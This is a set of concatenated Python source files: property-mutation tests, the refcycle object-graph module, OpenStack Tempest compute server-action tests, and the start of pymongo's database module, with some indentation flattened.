        obj = HasListProp(foo=["a", "b"])
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.reverse(),
                             ["a", "b"],
                             ["b", "a"])
    def test_list_sort(self):
        obj = HasListProp(foo=["b", "a"])
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.sort(),
                             ["b", "a"],
                             ["a", "b"])
class HasStringDictProp(Model):
    # Model with a string-keyed Dict property; used by TestDictMutation.
    foo = Dict(String, Any)
    def __init__(self, **kwargs):
        super(HasStringDictProp, self).__init__(**kwargs)
class HasIntDictProp(Model):
    # Model with an int-keyed Dict property; used by TestDictMutation.
    foo = Dict(Int, Any)
    def __init__(self, **kwargs):
        super(HasIntDictProp, self).__init__(**kwargs)
class TestDictMutation(TestContainerMutation):
    """Change events fired by mutating a Dict property in place."""
    def test_whether_included_in_props_with_values(self):
        obj = HasStringDictProp()
        assert 'foo' not in obj.properties_with_values(include_defaults=False)
        assert 'foo' in obj.properties_with_values(include_defaults=True)
        # simply reading the property creates a new wrapper, so be
        # sure that doesn't count as replacing the default
        foo = obj.foo
        assert foo == foo # this is to calm down flake's unused var warning
        assert 'foo' not in obj.properties_with_values(include_defaults=False)
        assert 'foo' in obj.properties_with_values(include_defaults=True)
        # but changing the dict should count as replacing the default
        obj.foo['bar'] = 42
        assert 'foo' in obj.properties_with_values(include_defaults=False)
        assert 'foo' in obj.properties_with_values(include_defaults=True)
    def test_assignment_maintains_owners(self):
        # Re-assigning the property must move ownership to the new wrapper.
        obj = HasStringDictProp()
        old_dict = obj.foo
        assert isinstance(old_dict, PropertyValueDict)
        assert 1 == len(old_dict._owners)
        obj.foo = dict(a=1)
        new_dict = obj.foo
        assert isinstance(new_dict, PropertyValueDict)
        assert old_dict is not new_dict
        assert 0 == len(old_dict._owners)
        assert 1 == len(new_dict._owners)
    def test_dict_delitem_string(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            del x['b']
        self._check_mutation(obj, 'foo', mutate,
                             dict(a=1, b=2, c=3),
                             dict(a=1, c=3))
    def test_dict_delitem_int(self):
        obj = HasIntDictProp(foo={ 1 : "a", 2 : "b", 3 : "c" })
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            del x[1]
        self._check_mutation(obj, 'foo', mutate,
                             { 1 : "a", 2 : "b", 3 : "c" },
                             { 2 : "b", 3 : "c" })
    def test_dict_setitem_string(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            x['b'] = 42
        self._check_mutation(obj, 'foo', mutate,
                             dict(a=1, b=2, c=3),
                             dict(a=1, b=42, c=3))
    def test_dict_setitem_int(self):
        obj = HasIntDictProp(foo={ 1 : "a", 2 : "b", 3 : "c" })
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            x[2] = "bar"
        self._check_mutation(obj, 'foo', mutate,
                             { 1 : "a", 2 : "b", 3 : "c" },
                             { 1 : "a", 2 : "bar", 3 : "c" })
    def test_dict_clear(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            x.clear()
        self._check_mutation(obj, 'foo', mutate,
                             dict(a=1, b=2, c=3),
                             dict())
    def test_dict_pop(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            x.pop('b')
        self._check_mutation(obj, 'foo', mutate,
                             dict(a=1, b=2, c=3),
                             dict(a=1, c=3))
    def test_dict_pop_default_works(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        assert 42 == obj.foo.pop('z', 42)
    def test_dict_popitem_works(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        i = obj.foo.popitem()
        assert i == ('a', 1) or i == ('b', 2) or i == ('c', 3)
        # we don't _check_mutation since the end value is nondeterministic
    def test_dict_setdefault(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            b = x.setdefault('b', 43)
            assert 2 == b
            z = x.setdefault('z', 44)
            assert 44 == z
        self._check_mutation(obj, 'foo', mutate,
                             dict(a=1, b=2, c=3),
                             dict(a=1, b=2, c=3, z=44))
    def test_dict_update(self):
        obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
        assert isinstance(obj.foo, PropertyValueDict)
        def mutate(x):
            x.update(dict(b=7, c=8))
        self._check_mutation(obj, 'foo', mutate,
                             dict(a=1, b=2, c=3),
                             dict(a=1, b=7, c=8))
|
|
# Copyright 2013 Mark Dickinson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tools to analyze the Python object graph and find reference cycles.
"""
import gc
import itertools
import six
from refcycle.annotations import object_annotation, annotated_references
from refcycle.annotated_graph import (
AnnotatedEdge,
AnnotatedGraph,
AnnotatedVertex,
)
from refcycle.element_transform_set import ElementTransformSet
from refcycle.key_transform_dict import KeyTransformDict
from refcycle.i_directed_graph import IDirectedGraph
class ObjectGraph(IDirectedGraph):
"""Directed graph representing a collection of Python objects and the
references between them.
An ObjectGraph can be constructed directly from an existing iterable
collection of objects::
>>> from refcycle import ObjectGraph
>>> inner = [1, 2, 3]
>>> outer = [inner] * 3
>>> graph = ObjectGraph([outer, inner])
>>> graph
<refcycle.object_graph.ObjectGraph object of size 2 at 0x100470ed0>
This constructs a graph whose vertices are the two Python objects ``inner``
and ``outer``. All references between the given objects are automatically
added as graph edges.
The ObjectGraph acts as a container for those objects, much like a set::
>>> inner in graph
True
>>> 2 in graph
False
>>> len(graph)
2
>>> list(graph)
[[[1, 2, 3], [1, 2, 3], [1, 2, 3]], [1, 2, 3]]
We can find the referrers and referents of any particular object in the
graph using the :meth:`~refcycle.object_graph.ObjectGraph.parents` and
:meth:`~refcycle.object_graph.ObjectGraph.children` methods.
>>> graph.children(outer)
[[1, 2, 3], [1, 2, 3], [1, 2, 3]]
Here we see ``inner`` occurring three times as a child of ``outer``,
because there are three distinct references from ``outer`` to ``inner``.
"""
###########################################################################
### IDirectedGraph interface.
###########################################################################
    def head(self, edge):
        """
        Return the head (target, destination) of the given edge.
        """
        # Edges are opaque keys into the _head mapping built by _raw.
        return self._head[edge]
    def tail(self, edge):
        """
        Return the tail (source) of the given edge.
        """
        # Edges are opaque keys into the _tail mapping built by _raw.
        return self._tail[edge]
    def out_edges(self, vertex):
        """
        Return a list of the edges leaving this vertex.
        """
        return self._out_edges[vertex]
    def in_edges(self, vertex):
        """
        Return a list of the edges entering this vertex.
        """
        return self._in_edges[vertex]
    @property
    def vertices(self):
        """
        Return the collection of vertices of the graph.
        """
        return self._vertices
    @property
    def edges(self):
        """
        Return the collection of edges of the graph.
        """
        return self._edges
def full_subgraph(self, objects):
"""
Return the subgraph of this graph whose vertices
are the given ones and whose edges are the edges
of the original graph between those vertices.
"""
vertices = ElementTransformSet(transform=id)
out_edges = KeyTransformDict(transform=id)
in_edges = KeyTransformDict(transform=id)
for obj in objects:
vertices.add(obj)
out_edges[obj] = []
in_edges[obj] = []
edges = set()
head = {}
tail = {}
for referrer in vertices:
for edge in self._out_edges[referrer]:
referent = self._head[edge]
if referent not in vertices:
continue
edges.add(edge)
tail[edge] = referrer
head[edge] = referent
out_edges[referrer].append(edge)
in_edges[referent].append(edge)
return ObjectGraph._raw(
vertices=vertices,
edges=edges,
out_edges=out_edges,
in_edges=in_edges,
head=head,
tail=tail,
)
###########################################################################
### Set and dict overrides.
###########################################################################
    @classmethod
    def vertex_set(cls):
        """Return an empty vertex set keyed on object identity (id)."""
        return ElementTransformSet(transform=id)
    @classmethod
    def vertex_dict(cls):
        """Return an empty vertex-keyed dict keyed on object identity (id)."""
        return KeyTransformDict(transform=id)
    @classmethod
    def vertex_equal(cls, vertex1, vertex2):
        """Two vertices are equal only if they are the very same object."""
        return vertex1 is vertex2
###########################################################################
### ObjectGraph constructors.
###########################################################################
@classmethod
def _raw(cls, vertices, edges, out_edges, in_edges, head, tail):
"""
Private constructor for direct construction
of an ObjectGraph from its attributes.
vertices is the collection of vertices
out_edges and in_edges map vertices to lists of edges
head and tail map edges to objects.
"""
self = object.__new__(cls)
self._out_edges = out_edges
self._in_edges = in_edges
self._head = head
self._tail = tail
self._vertices = vertices
self._edges = edges
return self
@classmethod
def _from_objects(cls, objects):
"""
Private constructor: create graph from the given Python objects.
The constructor examines the referents of each given object to build up
a graph showing the objects and their links.
"""
vertices = ElementTransformSet(transform=id)
out_edges = KeyTransformDict(transform=id)
in_edges = KeyTransformDict(transform=id)
for obj in objects:
vertices.add(obj)
out_edges[obj] = []
in_edges[obj] = []
# Edges are identified by simple integers, so
# we can use plain dictionaries for mapping
# edges to their heads and tails.
edge_label = itertools.count()
edges = set()
head = {}
tail = {}
for referrer in vertices:
for referent in gc.get_referents(referrer):
if referent not in vertices:
continue
edge = next(edge_label)
edges.add(edge)
tail[edge] = referrer
head[edge] = referent
out_edges[referrer].append(edge)
in_edges[referent].append(edge)
return cls._raw(
vertices=vertices,
edges=edges,
out_edges=out_edges,
in_edges=in_edges,
head=head,
tail=tail,
)
def __new__(cls, objects=()):
return cls._from_objects(objects)
###########################################################################
### Annotations.
###########################################################################
def annotated(self):
"""
Annotate this graph, returning an AnnotatedGraph object
with the same structure.
"""
# Build up dictionary of edge annotations.
edge_annotations = {}
for edge in self.edges:
if edge not in edge_annotations:
# We annotate all edges from a given object at once.
referrer = self._tail[edge]
known_refs = annotated_references(referrer)
for out_edge in self._out_edges[referrer]:
referent = self._head[out_edge]
if known_refs[referent]:
annotation = known_refs[referent].pop()
else:
annotation = None
edge_annotations[out_edge] = annotation
annotated_vertices = [
AnnotatedVertex(
id=id(vertex),
annotation=object_annotation(vertex),
)
for vertex in self.vertices
]
annotated_edges = [
AnnotatedEdge(
id=edge,
annotation=edge_annotations[edge],
head=id(self._head[edge]),
tail=id(self._tail[edge]),
)
for edge in self.edges
]
return AnnotatedGraph(
vertices=annotated_vertices,
edges=annotated_edges,
)
def export_image(self, filename='refcycle.png', format=None,
dot_executable='dot'):
"""
Export graph as an image.
This requires that Graphviz is installed and that the ``dot``
executable is in your path.
The *filename* argument specifies the output filename.
The *format* argument lets you specify the output format. It may be
any format that ``dot`` understands, including extended format
specifications like ``png:cairo``. If omitted, the filename extension
will be used; if no filename extension is present, ``png`` will be
used.
The *dot_executable* argument lets you provide a full path to the
``dot`` executable if necessary.
"""
return self.annotated().export_image(
filename=filename,
format=format,
dot_executable=dot_executable,
)
###########################################################################
### JSON serialization.
###########################################################################
def to_json(self):
"""
Convert to a JSON string.
"""
return self.annotated().to_json()
def export_json(self, filename):
"""
Export graph in JSON form to the given file.
"""
self.annotated().export_json(filename=filename)
def to_dot(self):
"""
Produce a graph in DOT format.
"""
return self.annotated().to_dot()
###########################################################################
### Other utility methods.
###########################################################################
def owned_objects(self):
"""
List of gc-tracked objects owned by this ObjectGraph instance.
"""
return (
[
self,
self.__dict__,
self._head,
self._tail,
self._out_edges,
self._out_edges._keys,
self._out_edges._values,
self._in_edges,
self._in_edges._keys,
self._in_edges._values,
self._vertices,
self._vertices._elements,
self._edges,
] +
list(six.itervalues(self._out_edges)) +
list(six.itervalues(self._in_edges))
)
def find_by_typename(self, typename):
"""
List of all objects whose type has the given name.
"""
return self.find_by(lambda obj: type(obj).__name__ == typename)
def count_by_typename(self):
"""Classify objects by type name.
Returns a collections.Counter instance mapping type names to the number
of objects `obj` in this graph for which `type(obj).__name__` matches
that type name.
"""
return self.count_by(lambda obj: type(obj).__name__)
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import urlparse
import testtools
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest.common.utils.linux import remote_client
from tempest import config
from tempest import exceptions
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class ServerActionsV3Test(base.BaseV3ComputeTest):
run_ssh = CONF.compute.run_ssh
def setUp(self):
# NOTE(afazekas): Normally we use the same server with all test cases,
# but if it has an issue, we build a new one
super(ServerActionsV3Test, self).setUp()
# Check if the server is in a clean state after test
try:
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
except Exception:
# Rebuild server if something happened to it during a test
self.__class__.server_id = self.rebuild_server(self.server_id)
def tearDown(self):
_, server = self.client.get_server(self.server_id)
self.assertEqual(self.image_ref, server['image']['id'])
self.server_check_teardown()
super(ServerActionsV3Test, self).tearDown()
@classmethod
def resource_setup(cls):
cls.prepare_instance_network()
super(ServerActionsV3Test, cls).resource_setup()
cls.client = cls.servers_client
cls.server_id = cls.rebuild_server(None)
@testtools.skipUnless(CONF.compute_feature_enabled.change_password,
'Change password not available.')
@test.attr(type='gate')
def test_change_server_password(self):
# The server's password should be set to the provided password
new_password = 'Newpass1234'
resp, body = self.client.change_password(self.server_id, new_password)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
if self.run_ssh:
# Verify that the user can authenticate with the new password
resp, server = self.client.get_server(self.server_id)
linux_client = remote_client.RemoteClient(server, self.ssh_user,
new_password)
linux_client.validate_authentication()
@test.attr(type='smoke')
def test_reboot_server_hard(self):
# The server should be power cycled
if self.run_ssh:
# Get the time the server was last rebooted,
resp, server = self.client.get_server(self.server_id)
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
boot_time = linux_client.get_boot_time()
resp, body = self.client.reboot(self.server_id, 'HARD')
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
if self.run_ssh:
# Log in and verify the boot time has changed
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
new_boot_time = linux_client.get_boot_time()
self.assertGreater(new_boot_time, boot_time)
@test.skip_because(bug="1014647")
@test.attr(type='smoke')
def test_reboot_server_soft(self):
# The server should be signaled to reboot gracefully
if self.run_ssh:
# Get the time the server was last rebooted,
resp, server = self.client.get_server(self.server_id)
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
boot_time = linux_client.get_boot_time()
resp, body = self.client.reboot(self.server_id, 'SOFT')
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
if self.run_ssh:
# Log in and verify the boot time has changed
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
new_boot_time = linux_client.get_boot_time()
self.assertGreater(new_boot_time, boot_time)
@test.attr(type='smoke')
def test_rebuild_server(self):
# The server should be rebuilt using the provided image and data
meta = {'rebuild': 'server'}
new_name = data_utils.rand_name('server')
password = 'rebuildPassw0rd'
resp, rebuilt_server = self.client.rebuild(self.server_id,
self.image_ref_alt,
name=new_name,
metadata=meta,
admin_password=password)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
# Verify the server properties after the rebuild completes
self.client.wait_for_server_status(rebuilt_server['id'], 'ACTIVE')
resp, server = self.client.get_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assertEqual(new_name, server['name'])
if self.run_ssh:
# Verify that the user can authenticate with the provided password
linux_client = remote_client.RemoteClient(server, self.ssh_user,
password)
linux_client.validate_authentication()
if self.image_ref_alt != self.image_ref:
self.client.rebuild(self.server_id, self.image_ref)
@test.attr(type='gate')
def test_rebuild_server_in_stop_state(self):
# The server in stop state should be rebuilt using the provided
# image and remain in SHUTOFF state
resp, server = self.client.get_server(self.server_id)
old_image = server['image']['id']
new_image = self.image_ref_alt \
if old_image == self.image_ref else self.image_ref
resp, server = self.client.stop(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'SHUTOFF')
resp, rebuilt_server = self.client.rebuild(self.server_id, new_image)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
# Verify the server properties after the rebuild completes
self.client.wait_for_server_status(rebuilt_server['id'], 'SHUTOFF')
resp, server = self.client.get_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
# Restore to the original image (The tearDown will test it again)
if self.image_ref_alt != self.image_ref:
self.client.rebuild(self.server_id, old_image)
self.client.wait_for_server_status(self.server_id, 'SHUTOFF')
self.client.start(self.server_id)
def _detect_server_image_flavor(self, server_id):
# Detects the current server image flavor ref.
resp, server = self.client.get_server(server_id)
current_flavor = server['flavor']['id']
new_flavor_ref = self.flavor_ref_alt \
if current_flavor == self.flavor_ref else self.flavor_ref
return current_flavor, new_flavor_ref
def _test_resize_server_confirm(self, stop=False):
# The server's RAM and disk space should be modified to that of
# the provided flavor
previous_flavor_ref, new_flavor_ref = \
self._detect_server_image_flavor(self.server_id)
if stop:
resp = self.servers_client.stop(self.server_id)[0]
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id,
'SHUTOFF')
resp, server = self.client.resize(self.server_id, new_flavor_ref)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'VERIFY_RESIZE')
self.client.confirm_resize(self.server_id)
expected_status = 'SHUTOFF' if stop else 'ACTIVE'
self.client.wait_for_server_status(self.server_id, expected_status)
resp, server = self.client.get_server(self.server_id)
self.assertEqual(new_flavor_ref, server['flavor']['id'])
if stop:
# NOTE(mriedem): tearDown requires the server to be started.
self.client.start(self.server_id)
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type='smoke')
def test_resize_server_confirm(self):
self._test_resize_server_confirm(stop=False)
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type='smoke')
def test_resize_server_confirm_from_stopped(self):
self._test_resize_server_confirm(stop=True)
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type='gate')
def test_resize_server_revert(self):
# The server's RAM and disk space should return to its original
# values after a resize is reverted
previous_flavor_ref, new_flavor_ref = \
self._detect_server_image_flavor(self.server_id)
resp, server = self.client.resize(self.server_id, new_flavor_ref)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'VERIFY_RESIZE')
self.client.revert_resize(self.server_id)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
resp, server = self.client.get_server(self.server_id)
self.assertEqual(previous_flavor_ref, server['flavor']['id'])
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting not available, backup not possible.')
@test.attr(type='gate')
def test_create_backup(self):
# Positive test:create backup successfully and rotate backups correctly
# create the first and the second backup
backup1 = data_utils.rand_name('backup-1')
resp, _ = self.servers_client.create_backup(self.server_id,
'daily',
2,
backup1)
oldest_backup_exist = True
# the oldest one should be deleted automatically in this test
def _clean_oldest_backup(oldest_backup):
if oldest_backup_exist:
try:
self.images_client.delete_image(oldest_backup)
except exceptions.NotFound:
pass
else:
LOG.warning("Deletion of oldest backup %s should not have "
"been successful as it should have been "
"deleted during rotation." % oldest_backup)
image1_id = data_utils.parse_image_id(resp['location'])
self.addCleanup(_clean_oldest_backup, image1_id)
self.assertEqual(202, resp.status)
self.images_client.wait_for_image_status(image1_id, 'active')
backup2 = data_utils.rand_name('backup-2')
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
resp, _ = self.servers_client.create_backup(self.server_id,
'daily',
2,
backup2)
image2_id = data_utils.parse_image_id(resp['location'])
self.addCleanup(self.images_client.delete_image, image2_id)
self.assertEqual(202, resp.status)
self.images_client.wait_for_image_status(image2_id, 'active')
# verify they have been created
properties = {
'image_type': 'backup',
'backup_type': "daily",
'instance_uuid': self.server_id,
}
resp, image_list = self.images_client.image_list_detail(
properties,
sort_key='created_at',
sort_dir='asc')
self.assertEqual(200, resp.status)
self.assertEqual(2, len(image_list))
self.assertEqual((backup1, backup2),
(image_list[0]['name'], image_list[1]['name']))
# create the third one, due to the rotation is 2,
# the first one will be deleted
backup3 = data_utils.rand_name('backup-3')
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
resp, _ = self.servers_client.create_backup(self.server_id,
'daily',
2,
backup3)
image3_id = data_utils.parse_image_id(resp['location'])
self.addCleanup(self.images_client.delete_image, image3_id)
self.assertEqual(202, resp.status)
# the first back up should be deleted
self.images_client.wait_for_resource_deletion(image1_id)
oldest_backup_exist = False
resp, image_list = self.images_client.image_list_detail(
properties,
sort_key='created_at',
sort_dir='asc')
self.assertEqual(200, resp.status)
self.assertEqual(2, len(image_list),
'Unexpected number of images for '
'v3:test_create_backup; was the oldest backup not '
'yet deleted? Image list: %s' %
[image['name'] for image in image_list])
self.assertEqual((backup2, backup3),
(image_list[0]['name'], image_list[1]['name']))
def _get_output(self):
resp, output = self.servers_client.get_console_output(
self.server_id, 10)
self.assertEqual(200, resp.status)
self.assertTrue(output, "Console output was empty.")
lines = len(output.split('\n'))
self.assertEqual(lines, 10)
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
@test.attr(type='gate')
def test_get_console_output(self):
# Positive test:Should be able to GET the console output
# for a given server_id and number of lines
# This reboot is necessary for outputting some console log after
# creating a instance backup. If a instance backup, the console
# log file is truncated and we cannot get any console log through
# "console-log" API.
# The detail is https://bugs.launchpad.net/nova/+bug/1251920
resp, body = self.servers_client.reboot(self.server_id, 'HARD')
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
self.wait_for(self._get_output)
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
@test.attr(type='gate')
def test_get_console_output_server_id_in_shutoff_status(self):
# Positive test:Should be able to GET the console output
# for a given server_id in SHUTOFF status
# NOTE: SHUTOFF is irregular status. To avoid test instability,
# one server is created only for this test without using
# the server that was created in setupClass.
resp, server = self.create_test_server(wait_until='ACTIVE')
temp_server_id = server['id']
resp, server = self.servers_client.stop(temp_server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(temp_server_id, 'SHUTOFF')
self.wait_for(self._get_output)
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
@test.attr(type='gate')
def test_pause_unpause_server(self):
resp, server = self.client.pause_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'PAUSED')
resp, server = self.client.unpause_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
@testtools.skipUnless(CONF.compute_feature_enabled.suspend,
'Suspend is not available.')
@test.attr(type='gate')
def test_suspend_resume_server(self):
resp, server = self.client.suspend_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'SUSPENDED')
resp, server = self.client.resume_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@test.attr(type='gate')
def test_shelve_unshelve_server(self):
resp, server = self.client.shelve_server(self.server_id)
self.assertEqual(202, resp.status)
offload_time = CONF.compute.shelved_offload_time
if offload_time >= 0:
self.client.wait_for_server_status(self.server_id,
'SHELVED_OFFLOADED',
extra_timeout=offload_time)
else:
self.client.wait_for_server_status(self.server_id,
'SHELVED')
resp, server = self.client.shelve_offload_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id,
'SHELVED_OFFLOADED')
resp, server = self.client.get_server(self.server_id)
image_name = server['name'] + '-shelved'
resp, images = self.images_client.image_list(name=image_name)
self.assertEqual(1, len(images))
self.assertEqual(image_name, images[0]['name'])
resp, server = self.client.unshelve_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
@test.attr(type='gate')
def test_stop_start_server(self):
resp, server = self.servers_client.stop(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'SHUTOFF')
resp, server = self.servers_client.start(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
@test.attr(type='gate')
def test_lock_unlock_server(self):
# Lock the server,try server stop(exceptions throw),unlock it and retry
resp, server = self.servers_client.lock_server(self.server_id)
self.assertEqual(202, resp.status)
resp, server = self.servers_client.get_server(self.server_id)
self.assertEqual(200, resp.status)
self.assertEqual(server['status'], 'ACTIVE')
# Locked server is not allowed to be stopped by non-admin user
self.assertRaises(exceptions.Conflict,
self.servers_client.stop, self.server_id)
resp, server = self.servers_client.unlock_server(self.server_id)
self.assertEqual(202, resp.status)
resp, server = self.servers_client.stop(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'SHUTOFF')
resp, server = self.servers_client.start(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
def _validate_url(self, url):
valid_scheme = ['http', 'https']
parsed_url = urlparse.urlparse(url)
self.assertNotEqual('None', parsed_url.hostname)
self.assertIn(parsed_url.scheme, valid_scheme)
@testtools.skipUnless(CONF.compute_feature_enabled.vnc_console,
'VNC Console feature is disabled')
@test.attr(type='gate')
def test_get_vnc_console(self):
# Get the VNC console
console_types = ['novnc', 'xvpvnc']
for console_type in console_types:
resp, body = self.servers_client.get_vnc_console(self.server_id,
console_type)
self.assertEqual(
200, resp.status,
"Failed to get Console Type: %s" % (console_type))
self.assertEqual(console_type, body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
@testtools.skipUnless(CONF.compute_feature_enabled.spice_console,
'Spice Console feature is disabled.')
@test.attr(type='gate')
def test_get_spice_console(self):
# Get the Spice console of type "spice-html5"
console_type = 'spice-html5'
resp, body = self.servers_client.get_spice_console(self.server_id,
console_type)
self.assertEqual(200, resp.status)
self.assertEqual(console_type, body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
@testtools.skipUnless(CONF.compute_feature_enabled.rdp_console,
'RDP Console feature is disabled.')
@test.attr(type='gate')
def test_get_rdp_console(self):
# Get the RDP console of type "rdp-html5"
console_type = 'rdp-html5'
resp, body = self.servers_client.get_rdp_console(self.server_id,
console_type)
self.assertEqual(200, resp.status)
self.assertEqual(console_type, body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
|
|
# Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Database level operations."""
import warnings
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.dbref import DBRef
from bson.objectid import ObjectId
from bson.py3compat import iteritems, string_type, _unicode
from bson.son import SON
from pymongo import auth, common
from pymongo.collection import Collection
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (CollectionInvalid,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import _first_batch
from pymongo.read_preferences import ReadPreference
from pymongo.son_manipulator import SONManipulator
from pymongo.write_concern import WriteConcern
def _check_name(name):
"""Check if a database name is valid.
"""
if not name:
raise InvalidName("database name cannot be the empty string")
for invalid_char in [" ", ".", "$", "/", "\\", "\x00"]:
if invalid_char in name:
raise InvalidName("database names cannot contain the "
"character %r" % invalid_char)
class Database(common.BaseObject):
"""A Mongo database.
"""
def __init__(self, client, name, codec_options=None,
read_preference=None, write_concern=None):
"""Get a database by client and name.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
database name.
:Parameters:
- `client`: A :class:`~pymongo.mongo_client.MongoClient` instance.
- `name`: The database name.
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) client.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) client.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) client.write_concern is used.
.. mongodoc:: databases
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
:class:`~pymongo.database.Database` no longer returns an instance
of :class:`~pymongo.collection.Collection` for attribute names
with leading underscores. You must use dict-style lookups instead::
db['__my_collection__']
Not:
db.__my_collection__
"""
super(Database, self).__init__(
codec_options or client.codec_options,
read_preference or client.read_preference,
